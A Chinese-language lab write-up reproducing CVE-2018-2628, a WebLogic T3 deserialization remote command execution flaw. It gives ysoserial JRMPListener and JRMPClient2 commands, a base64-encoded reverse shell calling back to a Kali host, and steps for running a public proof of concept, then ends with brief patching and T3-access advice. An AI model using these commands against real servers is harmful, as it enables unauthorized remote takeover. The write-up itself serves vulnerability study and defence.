目錄
- 0x01 漏洞介紹
- 0x02 環境部署:
- 0x03 漏洞復現
- 1. 查看T3服務
- 2. 下載檢測漏洞腳本,并進行解壓
- 3. 設定所要檢測的ip, 并運行腳本
- 4. 啟動JRMP Server
- 5. 制作Payload
- 6. 匯入Payload并修改目的IP
- 7. 進行監聽埠1234
- 8. 執行腳本weblogic_poc.py
- 9. 反彈shell成功
- 0x04 漏洞修復
0x01 漏洞介紹
-
漏洞描述
Weblogic Server WLS Core Components反序列化命令執行漏洞(CVE-2018-2628),該漏洞通過T3協議觸發,可導致未授權的用戶在遠程服務器執行任意命令 -
漏洞編號
CVE-2018-2628 -
受影響版本
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3
0x02 環境部署:
搭建一次,復現百次
靶機 ip:192.168.30.209
kali ip:192.168.30.182
0x03 漏洞復現
1. 查看T3服務
在kali上使用腳本weblogic-t3-info掃描目標主機是否開啟T3服務

從掃描結果可以看出目標主機已開啟T3服務
2. 下載檢測漏洞腳本,并進行解壓
git clone https://codechina.csdn.net/mirrors/Lighird/CVE-2018-2628.git

解壓:
unrar x CVE-2018-2628.rar /root/CVE-2018-2628

3. 設定所要檢測的ip, 并運行腳本


python CVE-2018-2628-MultiThreading.py

出現is vul CVE-2018-2628說明漏洞存在,接下來我們開始復現
4. 啟動JRMP Server
目的是為了使得觸發漏洞后weblogic所在服務器可以遠程呼叫執行特定的程式
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
#[listen port]是需要JRMP Server監聽的埠,這個埠的作用是為了讓目的主機上weblogic進行遠程呼叫kali方法時,可以連接到我們自己的主機
#[command]為要執行的命令
以下我們執行反彈shell命令,我們需要注意需要對執行的命令進行需要進行一次編碼,因為 Runtime.getRuntime().exec() 中不能使用管道符等bash需要的方法
編碼網址

#java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 8888 Jdk7u21 'bash -i >& /dev/tcp/192.168.30.182/1234 0>&1'
java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 8888 Jdk7u21 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjE4Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'

最后一行出現 * Opening JRMP listener on 8888,說明JRMP Server正在監聽8888埠
5. 制作Payload
在kali上打開一個新終端,使用ysoserial-0.1-cve-2018-2628-all.jar工具生成一個payload,因為要實作weblogic遠程呼叫kali方法,所以就需要知道kali主機的ip與埠
java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 192.168.30.182:8888 | xxd -p | tr -d $'\n' && echo

6. 匯入Payload并修改目的IP
將weblogic_poc.py中的使用的payload替換為我們剛剛生成的payload,并且將目標ip
vim weblogic_poc.py



7. 進行監聽埠1234

8. 執行腳本weblogic_poc.py

9. 反彈shell成功

0x04 漏洞修復
- 官方補丁:T3協議漏洞加固的話可以打上官方最新的補丁,可使用正版軟體許可賬戶登錄 https://support.oracle.com,下載最新補丁,
- 手工修復:控制T3協議的訪問權限來臨時阻斷漏洞利用,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/299475.html
標籤:其他
